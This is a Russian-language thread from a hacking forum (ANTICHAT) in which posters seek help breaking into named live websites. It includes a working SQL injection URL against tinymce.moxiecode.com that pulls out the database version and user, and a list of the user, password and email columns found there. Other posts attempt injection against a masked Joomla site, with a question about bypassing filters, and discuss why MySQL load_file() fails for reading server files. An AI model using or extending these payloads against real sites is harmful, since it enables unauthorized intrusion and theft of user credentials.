ANTICHAT — форум по информационной безопасности, OSINT и технологиям

PhpBB 3.0.1 перерыл всё могет кто подскажет что нить????

http://forum.tvingo.ru

Если через PHP include,то его я пока не нашёл.Load_File() не читает почему-то,хотя несколько условий соблюдаются:

1.Фаил расположен на сервере
2.Hex значения принимаются


Но вот насчёт третьего условия (права доступа к файлу) я сомневаюсь,так как при пхп инклуде и при лоад файле пользователи от разных приложений (я так думаю,но не факт,что это так)) ),ибо при пхп инклуде всё выходит.Запрет на load_file()...может,и действительно запрет,так как доказать я этого не смогу всвязи с отсутствием вывода ошибок.А так было бы высело почитать файлики.На одном сервере так вообще были рутовые права,т.к. бд под рутом была,что достаточно редко бывает, а лоад файлом прочесть ничего не смог.Вот и облом.Кто-то так пошутил нехорошо)))

Кстати,вопрос в студию,который меня очень долго мучает: От каких серверных(или Бог знает каких) настроек зависит вывод списка директорий с помощь load_file() ? Пару раз всего смог так наслаждаться прогулкой по серверу

Это капец! Здесь одни гуру сидят и про какойто phpBB 3.0.1 ничего сказать не могут!

Велемир, ты очень много всего сказал и из этого дельного - пара фраз)) Короче, load_file() может не работать из-за выключенного file_priv на пользователе из-под которого ты работаешь.

И ещё одно - load_file() вообще не исполняет php код. Так что шелл-картинка не заработает через load_file().

upd:

Чтоб узнать есть ли права на чтение файлов с помощью load_file() не обязательно иметь вывод ошибок. Тем более даже вывод ошибок ничего не даст, за редким исключением.

Надеюсь, на твои вопросы ответил, ибо вообще их не понял)

А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.

geforce,

http://milw0rm.com/
http://packetstormsecurity.net/
http://google.com/

з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31

how to inject this

i tried after

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 '&Itemid=31

and

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31'

doesnt work is this filtered how to bybass

waitting.............................

geforce, тебе тут никто ничего не должен

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Народ вот такая проблема
Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*

Дальше роем и находим таблицы
user
-user_name
-user_password
tbl_user
-u_username
-u_password
-u_email
punbb_users
-id
-username
-password
-email

составляем запросы


и
Но сайт упорно не хочет показывать содержимое таблиц

что делать чтобы оно показало?